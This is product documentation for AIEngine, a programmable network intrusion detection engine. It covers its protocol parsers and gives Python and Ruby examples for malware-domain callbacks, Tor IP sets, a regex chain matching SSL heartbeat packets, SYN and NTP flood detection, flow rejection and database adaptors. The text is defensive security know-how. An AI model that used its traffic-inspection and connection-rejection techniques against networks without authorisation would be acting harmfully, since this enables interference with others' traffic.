AIEngine description

Introduction

The aim of this document is to explain and describe the functionality that AIEngine, a new generation Network Intrusion Detection System engine, brings.

AIEngine is a next generation programmable network intrusion detection system. It supports the x86_64 and MIPS architectures on operating systems such as Linux, FreeBSD and MacOS.

Architecture

The core of AIEngine is a complex library implemented in the C++11/14 standard that processes packets in real time. This library is wrapped by an external layer of high level programming languages, such as Python, Ruby or even Java, which brings to the engine the flexibility of this type of language together with the speed and performance of C++14.

AIEngine internal architecture

The whole internal architecture is based on objects that may or may not be linked, depending on customer requirements, with other objects in order to provide a specific functionality. On the other hand, all the memory connections have internal caches that allow the system to process more than 5.000.000 concurrent TCP connections with no memory problems.

The system supports the most important protocols for different use cases.

  • Banking environments. Support for Bitcoin that allows customers to monitor, control and detect potential anomalies in their mining infrastructures.
  • IoT infrastructures. Support for the most used protocols of the Internet of Things; also, due to the architecture of the system, it can be embedded on small devices.
  • Data center environments. Support for the most used protocols in data centers in order to detect anomalies and potential attacks.
  • IMS environments. Nowadays, VoIP servers are the target of different types of attacks. The proposed system brings security to SIP servers in order to deal with the new threats of today.
  • Industrial infrastructures. Now it is critical to have security systems on industrial infrastructures that could potentially be attacked. The system implements the most common protocols for this type of environment, bringing more intelligence to the upper layers.

The engine is designed to support different network environments such as:

  • StackLan: Designed for enterprises based on LAN architectures with MPLS or VLANs.
  • StackMobile: Designed for mobile operators that need security on their Gn interfaces in order to secure their customer base.
  • StackLanIPv6: Designed to support IPv6 on LAN architectures.
  • StackVirtual: Designed for big data centers that support VXLAN in their architecture.
  • StackOpenflow: Designed for data centers that support OpenFlow (experimental).

AIEngine supports programming customer requirements as code in real time. This gives the engine the capability to deal with new threats with a reaction time close to zero. This code is written in a function that takes one parameter, the TCP/UDP connection object (the flow); we call such functions "callbacks". These callbacks can be plugged into different objects, as the following Ruby and Python examples show.

# Example of a callback attached to a DomainName object (Ruby)
def callback_domain(flow)
  print "Malware domain on: %s\n" % flow
end

d = DomainName.new("Malware domain", ".some.dns.from.malware.com")
d.callback = method(:callback_domain)

""" Example of callback on HTTP traffic (Python) """

def callback_zeus(flow):
    h = flow.http_info
    if h:
        host = str(h.host_name)
        if host:
            print("Suspicious activity detected on flow", str(flow), host)

d = DomainName("Domain from ZeuS botnet", ".malware.zeus.com")
d.callback = callback_zeus

""" Example of callback on SMTP traffic for IP reputation (Python) """

def callback_smtp_reputation(flow):
    h = flow.smtp_info
    if h:
        # access_ip_reputation_service is an external lookup supplied by the user
        if access_ip_reputation_service(flow.src_ip) == "Bad":
            print("Bad IP accessing email servers", str(flow))
            flow.label = "Bad reputation IP"

i = IPSet()
i.callback = callback_smtp_reputation

Features

AIEngine supports the following features in version 1.6.

Supported protocols

The engine supports the following protocols:

  • Bitcoin

    Bitcoin is a new way of generating and exchanging money. The system is able to manage the most common operations of the protocol, such as transactions, getdata, getblocks and so on.

  • CoAP

    The Constrained Application Protocol (CoAP) is a specialized web transfer protocol for use with constrained nodes and constrained networks in the Internet of Things (IoT). It is particularly targeted for small low power sensors, switches, valves and similar components that need to be controlled or supervised remotely, through standard Internet networks.

  • DHCP

    The most common DHCP operations are available on the engine.

  • DNS

    The Domain Name System (DNS) is one of the most used protocols on the Internet. DNS provides a way to learn the IP address of any host on the Internet, and is no different from any other directory service. From covert channels to Trojans, many types of malware use DNS to communicate with their services.

  • ETHERNET

    This is the most common link-layer protocol for carrying LAN frames.

  • GPRS

    The system supports the 3G and 4G GPRS versions. This is the most common protocol used by mobile operators on the Gn interface.

  • GRE

    Nowadays tunnels are very important in cloud environments. Most of these systems isolate the network in order to prevent security problems between different virtual systems. GRE is one of the most important tunnelling systems that allows network isolation, and the engine supports it in order to bring security to cloud environments.

  • HTTP 1.1

    Today HTTP is the most used protocol on the Internet. The majority of exploit attacks, Trojans and other types of malware also use this protocol in order to commit different kinds of cyber-crime. The engine implements a specific HTTP parser that supports the HTTP 1.1 standard, so that multiple requests on the same network conversation are handled.

  • ICMPv4/ICMPv6

    The Internet Control Message Protocol (ICMPv4 and ICMPv6) is one of the main protocols of the Internet protocol suite. It is used by network devices, like routers, to send error messages indicating, for example, that a requested service is not available or that a host or router could not be reached. Denial of service attacks have been carried out using this protocol, so it is key for the system to monitor and react to this type of attack.

  • IMAP

    The Internet Message Access Protocol (IMAP) is an Internet standard protocol used by e-mail clients to retrieve e-mail messages from a mail server over a TCP/IP connection. Attacks that use invalid credentials, and other types of attacks, need to be addressed.

  • IPv4/IPv6

    The Internet Protocol (IPv4 and IPv6) is the main communications protocol in the Internet protocol suite for relaying datagrams across network boundaries. This protocol has been involved in many types of attacks, such as fragmentation attacks.

  • MPLS

    Multi-Protocol Label Switching (MPLS) provides a mechanism for forwarding packets for any network protocol. MPLS flows are connection-oriented and packets are routed along pre-configured Label Switched Paths (LSPs). All the network stacks of the system support MPLS in all of its variants.

  • Modbus

    Modbus TCP is a communications protocol originally designed for use with programmable logic controllers (PLCs). Simple and robust, it has since become a de facto standard communication protocol, and is now a commonly available means of connecting industrial electronic devices. This protocol is very important for industrial systems that need to monitor and secure platforms which use this type of device.

  • MQTT

    MQTT is a publish/subscribe messaging protocol designed for lightweight M2M communications. It was originally developed by IBM and is now an open standard.

  • NTP

    The Network Time Protocol (NTP) is widely used to synchronize computer clocks on the Internet. The protocol is usually described in terms of a client-server model, but can as easily be used in peer-to-peer relationships where both peers consider the other to be a potential time source. One of the biggest DDoS attacks was carried out using this protocol.

  • OpenFlow

    OpenFlow is an open standard network protocol used to manage traffic between commercial Ethernet switches, routers and wireless access points. Nowadays, data centers use this standard to reduce costs and to manage their networks.

  • POP

    The Post Office Protocol (POP) is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. With this protocol users can download, delete, store and otherwise manage their e-mail.

  • Quic

    The Quic protocol (Quick UDP Internet Connections) is an experimental protocol designed by Google whose goal is to improve the perceived performance of connection-oriented web applications that currently use TCP.

  • RTP

    The Real-time Transport Protocol (RTP) defines a standard packet format for delivering audio and video over the Internet. It is defined in RFC 1889. RTP is used extensively in communication and entertainment systems that involve streaming media, such as telephony, video applications, television services and web-based push-to-talk features.

  • SIP

    The Session Initiation Protocol (SIP) is an application-layer control (signaling) protocol for creating, modifying, and terminating sessions with one or more participants. These sessions include Internet telephone calls, multimedia distribution, and multimedia conferences. This protocol is used to establish VoIP sessions.

  • SMTP

    The Simple Mail Transfer Protocol (SMTP) is a communication protocol for mail servers to transmit email over the Internet. SMTP provides a set of codes that simplify the communication of email messages between email servers. On the other hand, spammers use this protocol to send malware and spam over the Internet.

  • SNMP

    The Simple Network Management Protocol (SNMP) is a popular protocol for network management. It is used for collecting information from, and configuring, network devices such as servers, printers, hubs, switches, and routers on an IP network. SNMP exposes management data in the form of variables on the managed systems, which describe the system configuration. These variables can then be queried (and sometimes set) by managing applications. SNMP has been involved in DDoS reflection attacks in the past, so the system can detect this type of attack and notify other systems.

  • SSDP

    The Simple Service Discovery Protocol (SSDP) is a network protocol based on the IP suite for advertisement and discovery of network services and presence information. The SSDP protocol can discover Plug & Play devices, as part of UPnP (Universal Plug and Play). SSDP uses unicast and the multicast address 239.255.255.250. SSDP is an HTTP-like protocol and works with the NOTIFY and M-SEARCH methods. This protocol is basically used in the IoT to discover devices.

  • SSL

    SSL stands for Secure Sockets Layer and was originally created by Netscape. SSLv2 and SSLv3 are the 2 versions of this protocol (SSLv1 was never publicly released). After SSLv3, SSL was renamed to TLS. TLS stands for Transport Layer Security and started with TLSv1.0, which is an upgraded version of SSLv3. The primary goal of the TLS protocol is to provide privacy and data integrity between two communicating computer applications.

  • TCP

    The Transmission Control Protocol (TCP) is a transport layer protocol used by applications that require guaranteed delivery. It is a sliding window protocol that provides handling for both timeouts and retransmissions. On the other hand, TCP establishes a full duplex virtual connection between two endpoints, where each endpoint is defined by an IP address and a TCP port number. The operation of TCP is implemented as a finite state machine. A big variety of DDoS attacks have been carried out in the past and recently using incorrect flags, incorrect lengths, offsets and so on.

  • UDP

    The User Datagram Protocol (UDP) is an alternative communications protocol to TCP used primarily for establishing low-latency and loss tolerating connections between applications on the Internet.

  • VLAN

    A virtual LAN (VLAN) is any broadcast domain that is partitioned and isolated in a computer network at the data link layer. VLANs are used to provide the network segmentation services traditionally provided only by routers in LAN configurations.

  • VXLAN

    Virtual Extensible LAN (VXLAN) is a proposed encapsulation protocol for running an overlay network on existing Layer 3 infrastructure. The primary goal of VXLAN is to extend the virtual LAN (VLAN) address space by adding a 24-bit segment ID and increasing the number of available IDs to 16 million.

IPSet matching

Most engines allow adding sets of IP addresses in order to monitor or track specific hosts. The engine provides this functionality in an easy way. The following example shows how to load the IP addresses of the Tor network onto the engine.

import socket
import urllib2

ipset = IPSet()

ipset_mng = IPSetManager()
ipset_mng.add_ip_set(ipset)

""" Take a big list of IP addresses that belong to Tor """
req = urllib2.Request("https://www.dan.me.uk/torlist/")
try:
    response = urllib2.urlopen(req)
    for line in response.readlines():
        ip = line.strip()
        try:
            # Skip lines that are not valid IPv4 addresses
            socket.inet_aton(ip)
        except socket.error:
            continue
        ipset.add_ip_address(ip)
except urllib2.URLError as e:
    print("Error:", e)

""" Sets the IPSetManager on the stack (st) for TCP traffic """
st.tcp_ip_set_manager = ipset_mng

Regex graphs

Nowadays attacks get more and more complex, and with Regex Graphs the user is able to build any complex detection by using graphs of regular expressions, no matter how complex the attack is on the network flow. Complex detection patterns can be built with this functionality.

""" The RegexManager that will hold the regex graph """
sm = RegexManager()

""" Create a basic regex for matching generic SSL traffic """
ssl_sig = Regex("SSL Basic regex", "^\x16\x03")

""" Create another regex for matching the heartbeat packets of SSL """
sig = Regex("SSL Heartbeat", "^.*\x18\x03(\x01|\x02|\x03).*$")

""" Link both regex expressions """
ssl_sig.next_regex = sig

""" Add the main regex to the RegexManager """
sm.add_regex(ssl_sig)

""" Link the sm to the current network stack (st) """
st.tcp_regex_manager = sm
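To make the linked-regex idea concrete, here is an added example in plain Python that is not part of AIEngine: it models a regex chain with the re module and walks constructed TLS payloads through it. The assumption that the next_regex link is only evaluated on the packets that follow the first match is mine, made for illustration.

```python
import re

# Added example, not AIEngine code. Models the linked-regex ("regex graph")
# behaviour with plain Python: the root regex is evaluated on a flow's payloads;
# once it matches, only its next_regex is evaluated on the following payloads
# of the same flow. This evaluation order is an assumption for illustration.


class ChainedRegex:
    """A named bytes regex with an optional next_regex link."""

    def __init__(self, name, pattern):
        self.name = name
        self.pattern = re.compile(pattern, re.DOTALL)
        self.next_regex = None

    def matches(self, payload):
        return self.pattern.search(payload) is not None


def evaluate_flow(root, payloads):
    """Walk a flow's payloads through the regex chain.

    Returns the list of regex names matched in order. The chain advances one
    link per matching payload; payloads that do not match the current link are
    skipped, so the chain is only complete when the last link has matched.
    """
    matched = []
    current = root
    for payload in payloads:
        if current is None:
            break
        if current.matches(payload):
            matched.append(current.name)
            current = current.next_regex
    return matched


def chain_completed(root, payloads):
    """True when every link of the chain matched, in order, on this flow."""
    names = []
    node = root
    while node is not None:
        names.append(node.name)
        node = node.next_regex
    return evaluate_flow(root, payloads) == names


# The two regexes from the page, expressed as bytes patterns.
ssl_sig = ChainedRegex("SSL Basic regex", rb"^\x16\x03")
heartbeat_sig = ChainedRegex("SSL Heartbeat", rb"^.*\x18\x03(\x01|\x02|\x03).*$")
ssl_sig.next_regex = heartbeat_sig

# Constructed sample payloads (not real captures): a TLS 1.0 handshake record
# followed by a TLS 1.2 heartbeat record, plus a plain HTTP request that must
# not match the SSL chain at all.
TLS_HANDSHAKE = b"\x16\x03\x01\x00\x2f\x01\x00\x00\x2b\x03\x01" + b"\x00" * 32
TLS_HEARTBEAT = b"\x18\x03\x03\x00\x03\x01\x00\x00"
HTTP_REQUEST = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    print(evaluate_flow(ssl_sig, [TLS_HANDSHAKE, TLS_HEARTBEAT]))
    print(chain_completed(ssl_sig, [HTTP_REQUEST, TLS_HEARTBEAT]))
```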

Domain matching

The system supports domain name matching for the protocols HTTP, DNS, SMTP and SSL. On HTTP the Host field is evaluated with a DomainNameManager that checks whether any of its domains match.

d = DomainNameManager.new
dom = DomainName.new("Domain from my site", ".videos.mysite.com")
d.add_domain_name(dom)

# st is the network stack object
st.set_domain_name_manager(d, "HTTPProtocol")

Also, by using DomainNames it is possible to attach a subset of Regex objects to a domain. With this functionality the Regex will be more accurate and generate fewer false positives. Enabling it is as simple as assigning a value to a variable.

rm = RegexManager()
dom = DomainName("My specific domain",".customer1.isp.com")
dom.regex_manager = rm

This functionality is perfect for analyzing the content of HTTP traffic for unknown malware.

On the DNSProtocol, the match of a specific domain generates on the data output a JSON packet with all the IPs of the DNS response. This gives the system the capability to provide DNS records together with the resolved IP addresses in order to generate threat intelligence.

{
  "bytes": 297,
  "info": {
      "dnsdomain": "buzz.dom1.com",
      "ips": "34.192.29.124,34.192.29.51,34.192.29.184,34.192.29.121",
      "matchs": "My Domain",
      "qtype": 1
  },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.1",
  "layer7": "DNSProtocol",
  "portdst": 53,
  "portsrc": 48208,
  "proto": 17
}

Ban domain

Nowadays the quantity of traffic on networks is massive. With this functionality we can exclude traffic that would just consume resources on the engine; services such as Facebook or Twitter are candidates for this. This functionality is available on protocols like HTTP, DNS, SMTP and SSL.

d = DomainNameManager()
# list_banned_domains holds the domains to exclude, e.g. [".facebook.com", ".twitter.com"]
for dom in list_banned_domains:
    d.add_domain_name(DomainName("Banned domain", dom))

st.set_domain_name_manager(d, "http")

Memory management

The engine supports cleaning the memory caches in order to refresh the stored information.

On the other hand, the system provides functionality to increase or decrease the number of specific items allocated for a given protocol. This allows specific configurations for a given protocol, for example a dedicated DNS monitoring system that could handle 1.000.000 queries.

st = StackLan()

st.tcp_flows = 0
st.udp_flows = 1000000

""" Decrease the memory of the rest of UDP protocols """
st.decrease_allocated_memory(500000,"sip")
st.decrease_allocated_memory(500000,"ssdp")

""" Increase the DNSInfos of the DNS protocol """
st.increase_allocated_memory(1000000,"DNSProtocol")

DDoS support

The engine has mechanisms to handle denial of service attacks for the majority of the supported protocols. However, for some complex DDoS attacks the engine can accept specific customer requirements for specific attacks. To use this functionality we use the set_scheduler method of the PacketDispatcher. This method, in combination with the get_counters and get_cache methods of any of the stacks, allows the user to build detection for complex DDoS attack scenarios on their data centers.

Here is a basic example for detecting TCP SYN attacks with Ruby.

# @s is the network stack object
def scheduler_handler_tcp

  print "TCP DoS Checker\n"
  c = @s.get_counters("TCPProtocol")

  # Code the intelligence for detecting DDoS based on a
  # combination of flags, bytes, packets and so on.
  syns = c["syns"]
  synacks = c["synacks"]
  if (syns > (synacks * 100))
    print "System under a SYN DoS attack\n"
  end
end

Another example, for detecting attacks over NTP, in Python:

def scheduler_handler_ntp():

    total_ips = dict()
    ntp_flows = 0
    print("NTP DDoS Checker")
    # Protocol counters, available for further checks
    c = st.get_counters("NTPProtocol")

    # Count the number of different source IPs of the NTP flows
    for flow in st.udp_flow_manager:
        if flow.l7_protocol_name == "NTPProtocol":
            ntp_flows += 1
            total_ips[flow.src_ip] = 1

    # Every NTP flow coming from a different source IP hints at spoofed sources
    if ntp_flows > 0 and len(total_ips) == ntp_flows:
        print("System under a NTP DDoS attack")

All the protocols support the stack method get_counters, which allows extracting crucial information from any of the protocols.

""" Get statistics of the BitcoinProtocol """
c = st.get_counters("bitcoin")
print(c)
{'transaction': 1450, 'get blocks': 200, 'network addr': 4, 'packets': 14963,
 'inv': 1, 'reject': 0, 'bytes': 1476209, 'ping': 0, 'not found': 0,
 'alert': 0, 'headers': 0, 'getaddr': 24, 'version': 0, 'version ack': 34,
 'get headers': 12, 'pong': 0, 'getdata': 126, 'mempool': 0, 'block': 0}
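The two scheduler handlers above compare raw values from get_counters, but those counters are cumulative since start, so a practitioner would normally reason about the last interval. The following added example (plain Python, not AIEngine code) keeps a snapshot between scheduler runs for the SYN check and applies the distinct-source NTP check to constructed flow records; the counter keys "syns" and "synacks" are the ones used above, and the dict-based flow records stand in for Flow objects.

```python
# Added example, not AIEngine code. Detection logic a scheduler handler could
# run on the dictionaries returned by get_counters(), written so it runs
# without the engine. Flow records are constructed stand-ins for Flow objects
# exposing src_ip and l7_protocol_name.


class SynFloodDetector:
    """Tracks cumulative TCP counters between scheduler runs.

    get_counters() returns totals since start, so a ratio computed on the raw
    values would be dominated by history. Keeping the previous snapshot lets
    each check look only at the SYNs and SYN-ACKs of the last interval.
    """

    def __init__(self, ratio=100, min_syns=1000):
        self.ratio = ratio          # SYNs per SYN-ACK that trips the alarm
        self.min_syns = min_syns    # ignore intervals with too little traffic
        self._last = {"syns": 0, "synacks": 0}

    def check(self, counters):
        """Return True if the interval since the last call looks like a SYN flood."""
        syns = counters["syns"] - self._last["syns"]
        synacks = counters["synacks"] - self._last["synacks"]
        self._last = {"syns": counters["syns"], "synacks": counters["synacks"]}
        if syns < self.min_syns:
            return False
        # A healthy interval answers most SYNs with a SYN-ACK; a flood does not.
        return syns > synacks * self.ratio


def ntp_sources_look_spoofed(flows, protocol="NTPProtocol"):
    """Return True when every NTP flow comes from a different source address.

    Legitimate NTP clients re-query the same server from a stable address, so a
    set of flows where no source repeats is consistent with spoofed sources.
    Returns False when there are fewer than two NTP flows.
    """
    sources = set()
    ntp_flows = 0
    for flow in flows:
        if flow["l7_protocol_name"] == protocol:
            ntp_flows += 1
            sources.add(flow["src_ip"])
    return ntp_flows > 1 and len(sources) == ntp_flows


# Constructed counter snapshots, as two successive scheduler runs would see them.
COUNTERS_T0 = {"syns": 5000, "synacks": 4900, "packets": 200000}
COUNTERS_T1 = {"syns": 505000, "synacks": 4950, "packets": 900000}

# Constructed flow records: one address querying repeatedly vs. all distinct.
FLOWS_NORMAL = [
    {"src_ip": "192.0.2.10", "l7_protocol_name": "NTPProtocol"},
    {"src_ip": "192.0.2.10", "l7_protocol_name": "NTPProtocol"},
    {"src_ip": "192.0.2.11", "l7_protocol_name": "DNSProtocol"},
]
FLOWS_FLOOD = [
    {"src_ip": "198.51.100.%d" % i, "l7_protocol_name": "NTPProtocol"}
    for i in range(1, 21)
]

if __name__ == "__main__":
    det = SynFloodDetector()
    print(det.check(COUNTERS_T0), det.check(COUNTERS_T1))
    print(ntp_sources_look_spoofed(FLOWS_NORMAL), ntp_sources_look_spoofed(FLOWS_FLOOD))
```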

Bloom filter support

When the customer requirements need to track a large number of IP addresses, the IPSets are not enough. For this case, the system implements a bloom filter in order to support this requirement. Notice that bloom filters are fault tolerant caches, so false positives and false negatives could happen. However, depending on the number of IP addresses, we could recommend their usage.

This option needs to be set at compilation time (--enable-bloomfilter) and also requires the Boost bloom filter libraries on the system.

Reject TCP/UDP connections

Under some attacks the engine is capable of closing UDP and TCP connections in order to reduce the pressure on the servers and also to disturb the origin of the attack. This functionality is only available on StackLan and StackLanIPv6 for the moment.

def some_handler(flow):
    """ Some code on the flow """
    flow.reject = True

External labeling

In some cases the customer may want to label the communication with a personalized label, depending on their needs. The system allows labeling any Flow in an easy way, so that traffic is tagged as the customer wants.

def callback_for_http(flow):
    """ Call some external service to verify the reputation of a domain """
    h = flow.http_info
    if h:
        flow.label = external_domain_service(h.host_name)

Services such as IP reputation, domain reputation or GeoIP services can be used, labeling the flow depending on their return value.

Data integration

One of the biggest challenges of the engine is to allow sending the information to any type of database system. Nowadays, systems like MySQL, Redis, Cassandra or Hadoop are at the top of any company. By using the DatabaseAdaptor functionality, any integration is possible with negligible integration time.

For example, a database adaptor that writes the information to a file:

from pyaiengine import DatabaseAdaptor

class fileAdaptor(DatabaseAdaptor):
    def __init__(self, name):
        self.__f = open(name, "w")

    def __del__(self):
        self.__f.close()

    def update(self, key, data):
        self.__f.write("Update:[%s] %s\n" % (key, data))

    def insert(self, key):
        return

    def remove(self, key):
        return

Another example of a database adaptor integrated with Redis (Ruby):

require 'redis'

class RedisAdaptor < DatabaseAdaptor
  attr_reader :ftype

  def initialize(ftype)
    @ftype = ftype
    @conn = Redis.new
  end

  def insert(key)
    @conn.hset(@ftype, key, "{}")
  end

  def remove(key)
    @conn.hdel(@ftype, key)
  end

  def update(key, data)
    @conn.hset(@ftype, key, data)
  end
end

Example of integration with the ElasticSearch engine:

import json
from datetime import datetime

import GeoIP
import pyaiengine
from elasticsearch import Elasticsearch

class elasticSearchAdaptor(pyaiengine.DatabaseAdaptor):
    def __init__(self, name):
        self.__es = Elasticsearch()
        self.__gi = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE)
        self.__rep = ipReputationService()   # user-supplied reputation client
        self.__name = name

    def __del__(self):
        pass

    def update(self, key, data):
        """ In this example we enrich the data by using third party services """
        d = json.loads(data)
        d["timestamp"] = datetime.now()
        # Assumption: the flow key has the layout "proto:ipsrc:portsrc:ipdst:portdst"
        parts = key.split(":")
        ipsrc = parts[1]
        ipdst = parts[3]

        """ Make a GeoIP lookup to get the country """
        country = self.__gi.country_name_by_addr(ipsrc)
        d["country"] = country

        """ Make a reputation lookup of the IP """
        d["reputation"] = self.__rep.ip_reputation(ipdst)

        self.__es.index(index=self.__name, doc_type="networkdata", id=ipdst, body=d)

    def insert(self, key):
        pass

    def remove(self, key):
        pass

To support multiple data destinations we just need to write a class and define the following methods:

  • insert. Called when a new UDP or TCP connection is created.
  • update. Called to update the information of the connection, and also when an important event happens.
  • remove. Called when the connection closes or dies by timeout.

The information given to the update method is encoded as JSON, but in some specific cases the system can generate MSGPack.

HTTP data

{
  "bytes": 335147,
  "info": {
      "host": "img.weblogservice.com",
      "reqs": 2,
      "ress": 2
  },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.1",
  "layer7": "HTTPProtocol",
  "portdst": 80,
  "portsrc": 36628,
  "proto": 6,
  "tcpflags": "Flg[S(1)SA(1)A(382)F(0)R(0)P(5)Seq(3137345135,1583856454)]"
}

SSL data

{
  "bytes": 227925,
  "info": {
      "heartbeat": 0,
      "host": "image-store.servicesharecdn.com",
      "pdus": 4
  },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.1",
  "layer7": "SSLProtocol",
  "portdst": 443,
  "portsrc": 51402,
  "proto": 6,
  "tcpflags": "Flg[S(1)SA(1)A(254)F(0)R(0)P(8)Seq(964705160,2834021200)]"
}

SMTP data

{
  "bytes": 21083,
  "country": "Afganistan",
  "reputation": "Suspicious",
  "info": {
      "from": "gurpartap@patriots.com",
      "to": "raj_deol2002in@yahoo.co.uk"
  },
  "ipdst": "192.168.1.245",
  "ipsrc": "192.168.1.1",
  "layer7": "SMTPProtocol",
  "portdst": 25,
  "portsrc": 1470,
  "proto": 6,
  "tcpflags": "Flg[S(1)SA(1)A(47)F(2)R(0)P(20)Seq(2126810402,2934727626)]",
  "timestamp": "2015-01-07 10:08:45.453259"
}

IMAP data

{
  "bytes": 10083,
  "reputation": "Suspicious",
  "info": {
      "user": "mark.allen@service.com"
  },
  "ipdst": "192.168.1.245",
  "ipsrc": "192.168.1.1",
  "layer7": "IMAPProtocol",
  "portdst": 143,
  "portsrc": 1470,
  "proto": 6,
  "tcpflags": "Flg[S(1)SA(1)A(47)F(2)R(0)P(20)Seq(2126810402,2934727626)]",
  "timestamp": "2015-10-07 10:08:45.453259"
}

POP data

{
  "bytes": 170083,
  "info": {
      "user": "mark.allen@service.com"
  },
  "ipdst": "192.168.1.245",
  "ipsrc": "192.168.1.1",
  "layer7": "POPProtocol",
  "portdst": 110,
  "portsrc": 21470,
  "proto": 6,
  "tcpflags": "Flg[S(1)SA(1)A(47)F(2)R(0)P(20)Seq(2126810402,2934727626)]"
}

Bitcoin data

{
  "bytes": 1664909,
  "info": {
      "blocks": 2,
      "rejects": 0,
      "tx": 6
  },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.142",
  "layer7": "BitcoinProtocol",
  "portdst": 8333,
  "portsrc": 55317,
  "proto": 6,
  "tcpflags": "Flg[S(1)SA(1)A(1662)F(0)R(0)P(8)Seq(1410785638,4110238515)]"
}

DNS data

{
  "bytes": 297,
  "info": {
      "dnsdomain": "www.googleadservices.com",
      "ips": "174.12.24.156,174.12.24.157,174.12.24.154,174.12.24.155",
      "matchs": "Generic google services",
      "qtype": 1
  },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.1",
  "layer7": "DNSProtocol",
  "portdst": 53,
  "portsrc": 48208,
  "proto": 17
}

SIP data

{
  "bytes":7100,
  "info": {
      "uri": "sip:192.168.1.200:5060;transport=UDP",
      "from": "'David Power'<sip:david_and@192.168.1.200:5060;transport=UDP>",
      "to":"'David Power'<sip:david_and@192.168.1.200:5060;transport=UDP>",
      "via":"SIP/2.0/UDP 192.168.1.100:5060"
   },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.1",
  "layer7": "SIPProtocol",
  "portdst": 5060,
  "portsrc": 48208,
  "proto": 17
}

SSDP data

{
  "bytes": 133,
  "info": {
      "host": "239.255.255.250:1900",
      "reqs": 1,
      "ress": 0,
      "uri": "*"
  },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.1",
  "layer7": "SSDPProtocol",
  "portdst": 1900,
  "portsrc": 52254,
  "proto": 17
}

CoAP data

{
  "bytes": 233,
  "info": {
      "host": "someiot.com",
      "uri": "/some/resource/data/"
  },
  "ipdst": "192.168.1.254",
  "ipsrc": "192.168.1.1",
  "layer7": "CoAPProtocol",
  "portdst": 5683,
  "portsrc": 52254,
  "proto": 17
}

MQTT data

{
  "bytes": 2509,
  "info": {
      "operation": 11,
      "total_client": 4,
      "total_server": 7
  },
  "ipdst": "192.168.1.7",
  "ipsrc": "10.0.2.15",
  "layer7": "MQTTProtocol",
  "portdst": 1883,
  "portsrc": 44691,
  "proto": 6,
  "tcpflags": "Flg[S(1)SA(1)A(22)F(1)R(0)P(10)Seq(2637347154,3369099113)]"
}
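The records above are what the update method receives as its data argument. The following added example (plain Python, not AIEngine code, so it does not subclass pyaiengine.DatabaseAdaptor) shows a sink with the same three methods that parses those JSON records, decodes the "tcpflags" string into counts and keeps per-protocol statistics; the key layout "ipsrc:portsrc:ipdst:portdst" and the sample records are constructed for the example.

```python
import json
import re

# Added example, not AIEngine code. A DatabaseAdaptor-shaped sink (insert,
# update, remove) that consumes the JSON update records shown above, parses
# the "tcpflags" field and keeps per-layer7 statistics. The key layout used
# in the samples ("ipsrc:portsrc:ipdst:portdst") is an assumption.

TCPFLAGS_RE = re.compile(r"([A-Z]+)\((\d+)\)")
TCPSEQ_RE = re.compile(r"Seq\((\d+),(\d+)\)")


def parse_tcpflags(value):
    """Turn 'Flg[S(1)SA(1)A(382)F(0)R(0)P(5)Seq(a,b)]' into a dict of counts.

    Returns e.g. {"S": 1, "SA": 1, "A": 382, "F": 0, "R": 0, "P": 5,
                  "seq": (a, b)}; the Seq(...) part is kept separately.
    """
    body = value[value.find("[") + 1 : value.rfind("]")]
    flags = {}
    seq_match = TCPSEQ_RE.search(body)
    if seq_match:
        flags["seq"] = (int(seq_match.group(1)), int(seq_match.group(2)))
        body = body[: seq_match.start()]
    for name, count in TCPFLAGS_RE.findall(body):
        flags[name] = int(count)
    return flags


class StatsAdaptor:
    """Collects per-layer7 byte counts and notes flows with many RSTs.

    Mirrors the three methods the engine calls on a DatabaseAdaptor.
    """

    def __init__(self, rst_threshold=3):
        self.rst_threshold = rst_threshold
        self.bytes_by_layer7 = {}
        self.open_flows = set()
        self.reset_heavy = []

    def insert(self, key):
        self.open_flows.add(key)

    def update(self, key, data):
        record = json.loads(data)
        layer7 = record.get("layer7", "unknown")
        self.bytes_by_layer7[layer7] = (
            self.bytes_by_layer7.get(layer7, 0) + record.get("bytes", 0)
        )
        if "tcpflags" in record:
            flags = parse_tcpflags(record["tcpflags"])
            if flags.get("R", 0) >= self.rst_threshold:
                self.reset_heavy.append(key)

    def remove(self, key):
        self.open_flows.discard(key)


# Constructed update records in the format shown above (not real captures).
SAMPLE_UPDATES = [
    ("192.168.1.1:36628:192.168.1.254:80", json.dumps({
        "bytes": 335147, "layer7": "HTTPProtocol", "proto": 6,
        "tcpflags": "Flg[S(1)SA(1)A(382)F(0)R(0)P(5)Seq(3137345135,1583856454)]",
    })),
    ("192.168.1.1:51402:192.168.1.254:443", json.dumps({
        "bytes": 227925, "layer7": "SSLProtocol", "proto": 6,
        "tcpflags": "Flg[S(1)SA(1)A(254)F(0)R(4)P(8)Seq(964705160,2834021200)]",
    })),
    ("192.168.1.1:48208:192.168.1.254:53", json.dumps({
        "bytes": 297, "layer7": "DNSProtocol", "proto": 17,
    })),
]


def run_sample():
    """Feed the constructed records through the adaptor and return it."""
    adaptor = StatsAdaptor()
    for key, data in SAMPLE_UPDATES:
        adaptor.insert(key)
        adaptor.update(key, data)
    adaptor.remove("192.168.1.1:48208:192.168.1.254:53")
    return adaptor


if __name__ == "__main__":
    a = run_sample()
    print(a.bytes_by_layer7, a.reset_heavy, sorted(a.open_flows))
```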

ZeroDay exploits signature generation

Some exploits have the capability of encrypting their content for every instance; this is called polymorphism/metamorphism. In this case the generation of the signature depends on the speed of the vendor teams, and sometimes it comes late. For this case, the engine is capable of automatically generating signatures for unknown traffic that will detect and neutralize (if integrated with a firewall) the attack.

This generation can be implemented by using the Python/Ruby API or by using the binary in combination with the network forensics functionality.

[Figure: images/exploit.png]

Nowadays, unknown attacks on any type of device happen: mobile phones, laptops, IoT devices and so on are perfect targets for these attacks. By using the signature generation it is possible for the customer to:

  • Identify unknown network traffic sources.
  • Generate evidence for forensic analysis or storage.
  • Given a pcap file of unknown traffic, automatically identify a valid signature for that traffic.
  • Reuse the signature in real time and start to identify this unknown attack.

With this functionality customers don't depend on updates from third party companies: you own your data.

Yara signatures

